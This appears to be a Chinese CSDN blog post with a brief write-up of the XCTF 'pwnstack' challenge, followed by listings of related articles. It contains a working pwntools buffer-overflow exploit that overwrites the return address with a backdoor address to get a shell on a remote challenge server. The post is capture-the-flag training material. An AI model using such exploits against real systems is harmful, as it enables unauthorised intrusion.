攻防世界1

于 2024-10-11 18:05:34 发布
阅读量249 收藏
点赞数 8
文章标签: 前端 linux javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142845058
版权

pwnstack

发现是64位文件

发现vuln双击进入

看到read知道这里是要将B1(177)的数据输入buf,这里涉及了栈溢出

发现system和binsh

后门

A8十进制是168

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','52779')
padding = b'a'*(0xa8)
door = 0x400762
payload = padding + p64(door)
io.sendline(payload)
io.interactive()

樊少泽
关注
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
Javascript数组研究03_手写实现_fill_filter_find_findIndex_findLast_findLastIndex
qq_33546823的博客
10-03 1332
fill()方法用一个固定值填充一个数组中从起始索引(默认为 0)到终止索引(默认为)内的全部元素。它返回修改后的数组。输入参数value:用来填充数组元素的值。start(可选):开始填充的位置,默认值为 0,索引处理方法和copyWithin一致。end(可选):停止填充的位置(不包含该位置),默认值为,索引处理方法和copyWithin方法一致。输出:修改后的原数组。注意事项该方法会改变原数组,是修改方法。对于稀疏数组,空槽也会被value填充。是通用的方法在空数组上不会有任何处理。
Vue--Table的Column格式化方案
m0_69435612的博客
10-04 308
原日期格式:2024-09-07T08:32:41.000+00:00。格式化成YYYY-MM-DD。让数字显示小数点后几位。
前端的全栈混合之路Meteor篇(四):支持自定义对象序列化的EJSON介绍
分享有趣的、贴近生活的CS知识
10-07 834
在Meteor框架中,EJSON(Extended JSON)是一个扩展了标准JSON的库,旨在支持更多的数据类型。标准JSON仅支持字符串、数字、布尔值、数组和对象等基本数据类型,而EJSON允许开发者在Meteor应用中传输更复杂的数据类型,例如DateBinary数据,甚至是自定义对象,这使得Meteor在客户端和服务器之间传递复杂数据变得更加便捷和高效。
Vue根实例、实例总结
m0_54007573的博客
10-04 682
Vue根实例、实例总结
前后分离项目记录
qq_25806839的博客
10-10 152
打包报错 Thread Loader时,增加以下代码: 上线,打包prod时:
vue3实现excel文件预览和打印功能
bjzhang75的博客
10-04 555
vue3实现excel文件预览和打印功能
一文区分SSTI 和 CSTI
zkaq7777777的博客
10-10 155
𝗦𝗲𝗿𝘃𝗲𝗿-𝘀𝗶𝗱𝗲 𝘁𝗲𝗺𝗽𝗹𝗮𝘁𝗲 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 指可能发生使用服务器端模板引擎的 Web 应用程序。它涉及代码注入攻击,攻击者可以在服务器端模板中注入并执行恶意代码。𝗖𝗹𝗶𝗲𝗻𝘁 𝗦𝗶𝗱𝗲 𝗧𝗲𝗺𝗽𝗹𝗮𝘁𝗲 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 是一个安全问题,攻击者的输入是注入页面并由客户端 JavaScript 库处理。TL;SSTI 允许在远程服务器上执行代码,而 CSTI 允许在受害者端【客户端】执行任意 JavaScript 代码。
探秘纯前端Excel表格:构建现金流量表的完整指南
葡萄城技术团队博客
10-10 602
现金流量表(Cash Flow Statement),是指反映企业在一定会计期间现金和现金等价物流入和流出的报表。现金流量表是企业财务报表的三个基本报告之一(另外两个是资产负债表和损益表)。为了全面系统地揭示企业一定时期的财务状况、经营成果和现金流量,财务报表需按财政部会计准则的标准格式设计,因此,财务报表的典型特征是数据更新频繁、分析维度多、数据来源复杂,常规的报表工具很难同时满足上述所有需求本博客将带大家了解如何使用类Excel 的 JavaScript 电子表格在前端创建现金流日历。。
Vue:点击图片在新的页面打开
MMF博客园
10-10 132
Vue:点击图片在新的页面打开
字节跳动青训营开始报名了!
窗外风景随心变幻
10-10 813
青训营是字节跳动技术团队发起的技术系列培训 &人才选拔项目;面向高校在校生,旨在培养优秀且具有职业竞争力的开发工程师。本次技术训练营由掘金联合豆包MarsCode 团队主办课程包含前端、后端和 A 方向,在这个飞速发展的 AI 时代,我们将和豆包MarsCode 一起深入探索,在青训营的技术氛围中,学习 AI,使用 Al,高效写码~
React中useEffect钩子
最新发布
警警的博客
10-10 615
useEffect是 React 中的一个 Hook,用于在函数组件中执行副作用操作。副作用操作包括数据获取、订阅或手动更改 React 组件中的 DOM 等。useEffect使得在函数组件中处理这些操作变得简单而强大。
9个微服务最佳实践
Tech My Life
10-06 441
7⃣领域驱动设计:以业务领域为中心,优化业务理解。9⃣微服务编排:协调和管理微服务,简化服务管理。8⃣微前端架构:前端独立开发,灵活性,可维护。6⃣无状态服务器:不存储状态,增强可伸缩性。1⃣分离数据存储:独立数据库,提升灵活性。2⃣代码成熟度一致:质量稳定,避免技术债务。4⃣单一职责原则:业务功能单一,简化维护。5⃣容器化部署:提高环境一致性,可移植。3⃣独立构建流程:独自构建,快速部署。
案例-博客页面简单实现
Dingyuan0的博客
10-06 1656
文章目录本文内容只涉及前端1. 内容要求2. 画面展示初始化面演示视频3. 注意事项4. 代码区js文件夹下的jquery.min.js内容登录代码列表页面创作页面 本文内容只涉及前端 1. 内容要求 登录页面实现 博客列表页面实现 博客创作页面实现 链接: 开源在线 Markdown 编辑器 文本框可借助开源工具 2. 画面展示 初始化面 登录界面 博客列表页面 博客创作页面 演示视频 博客页面设计
04-SpringBootWeb案例(下)
ioncannontic的博客
10-06 1046
04-SpringBootWeb案例(下) 文件上传
攻防世界upload1
07-28
抱歉,我无法回答这个问题。 #### 引用[.reference_title] - *1* [攻防世界-upload1-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125274195)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值